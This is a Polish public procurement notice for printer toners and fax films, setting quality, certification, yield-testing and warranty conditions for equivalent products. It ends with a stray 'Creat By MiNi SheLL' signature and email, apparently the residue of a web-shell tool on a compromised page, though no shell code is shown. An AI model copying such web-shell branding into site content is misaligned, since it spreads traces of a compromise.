-TONER SHARP MX312GT	-4szt
-TONER TOSHIBA T-3520E	-4szt
-TONER XEROX 6125 BK	-14szt
-TONER XEROX 6125 CYAN	-5szt
-TONER XEROX 6125 MAGENTA	-4szt
-TONER XEROX 6125 YELLOW	-4szt
-FOLIA PANASONIC 52	-3szt
-FOLIA PANASONIC 57X	-1szt

- Zobowiązuje się Wykonawcę do dostarczenia w/w materiałów swoim transportem i na własny koszt do siedziby Zamawiającego w terminie 24 godzin od złożenia zamówienia w formie pisemnej, faxem lub telefonicznie.
- W przypadku stwierdzenia wad dostarczonego towaru Wykonawca zobowiązuje się do jego wymiany na swój koszt w terminie 48 godzin.
- Zamawiający dopuszcza zaoferowanie materiałów eksploatacyjnych równoważnych (tzw. zamienniki). Przez równoważne Zamawiający rozumie produkty w pełni kompatybilne z urządzeniami w których mają być użytkowane jako materiały eksploatacyjne, oraz posiadające nie gorsze niż produkty oryginalne parametry w zakresie wydajności, niezawodności oraz jakości. Zamontowanie i używanie materiałów eksploatacyjnych równoważnych nie może powodować utraty gwarancji producenta drukarki. 
- Oferowane materiały eksploatacyjne równoważne muszą być wytwarzane pod nadzorem zintegrowanego systemu zarządzania jakością, środowiskiem oraz BHP w zakresie projektowania, produkcji i dystrybucji komputerowych materiałów eksploatacyjnych zgodnych z wymogami norm ISO 9001:2008 w zakresie projektowania i produkcji biurowych materiałów eksploatacyjnych, 14001:2004 oraz PN-N 18001:2004 lub równoważnymi normami zharmonizowanymi światowymi/europejskimi. 
W celu potwierdzenia spełnienia powyższego wymogu Zamawiający żąda dołączenia do oferty certyfikatów ISO 9001, ISO 14001 oraz PN-N 18001 lub równoważnymi normami zharmonizowanymi światowymi/europejskimi. 
- Oferowane produkty muszą być fabrycznie nowe, tj. wykonane z nowych elementów lub pełnowartościowych komponentów z odzysku bez śladów użytkowania, które przed końcowym zmontowaniem gotowego wyrobu przeszły testy wykluczające wady materiałowe (nieszczelności, mikropęknięcia), w oryginalnych opakowaniach producenta z widocznym  logo i symbolem produktu, posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem odpowiednie do uszczelnień stosowanych prze producentów urządzeń, posiadające wymienione na nowe wszystkie komponenty wpływające bezpośrednio na jakość wydruku (w tym wałek optyczny) i gwarantujące bezpieczeństwo użytkowania.
 - W celu potwierdzenia, że podstawowe parametry produktów równoważnych (wydajność, kompatybilność) są równe lub przekraczają parametry odpowiadających im produktów oryginalnych, Zamawiający żąda dołączenia do oferty specyfikacji parametrów technicznych  (wydajność, kompatybilność, gwarancja) dla każdego zaoferowanego produktu oraz raportów z testów wydajnościowych oferowanych produktów, w których producent potwierdza wskazane parametry.
 - Zamawiający wymaga, aby testy wydajności prowadzone były zgodnie z międzynarodowymi normami, tj. ISO 19752:2004 i ISO 19798:2006 (dla kaset z tonerem do drukarek monochromatycznych i kolorowych), ISO 24711:2006  (dla kartridży atramentowych). Raporty powinny być sporządzone w języku polskim oraz powinny zawierać wszystkie informacje wymagane przez wskazane normy.
- Zamawiający wymaga, aby produkty równoważne objęte były dożywotnią gwarancją  (bez limitu czasu i stopnia zużycia, trwającą do momentu wyczerpania ładunku barwiącego).
- Oferowane równoważne materiały eksploatacyjne nie mogą powodować ograniczeń funkcji i możliwości sprzętu oraz zaniżać jakości wydruku w stosunku do materiałów oryginalnych. Wymagana jest również pełna kompatybilność z oprogramowaniem sprzętu: informowanie o liczbie wydrukowanych stron, poziomie zużycia tonera, tuszu, głowicy - jeśli sprzęt posiada takie możliwości. W przypadku, kiedy produkt oryginalny posiada wbudowany układ scalony, który monitoruje proces druku, produkt równoważny winien posiadać analogiczny element działający w ten sam sposób. Zamawiający zastrzega sobie prawo sprawdzenia oryginalności przedłożonych testów wydajności.
- W przypadku awarii urządzenia drukującego, której przyczyną będzie użycie materiału eksploatacyjnego równoważnego(zgodnie z ofertą Wykonawcy) Wykonawca zobowiązuje się do naprawy lub dokona wymiany sprzętu na nowy na swój koszt. Naprawa odbędzie się w autoryzowanym serwisie i nie będzie powodować utraty dalszej gwarancji. 
- Zakres zamawianego asortymentu może ulec zmianie do 10 % wartości zamówienia, wykonawcy nie będą przysługiwały z tego tytułu żadne roszczenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.23.00-4, 30.19.21.12-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com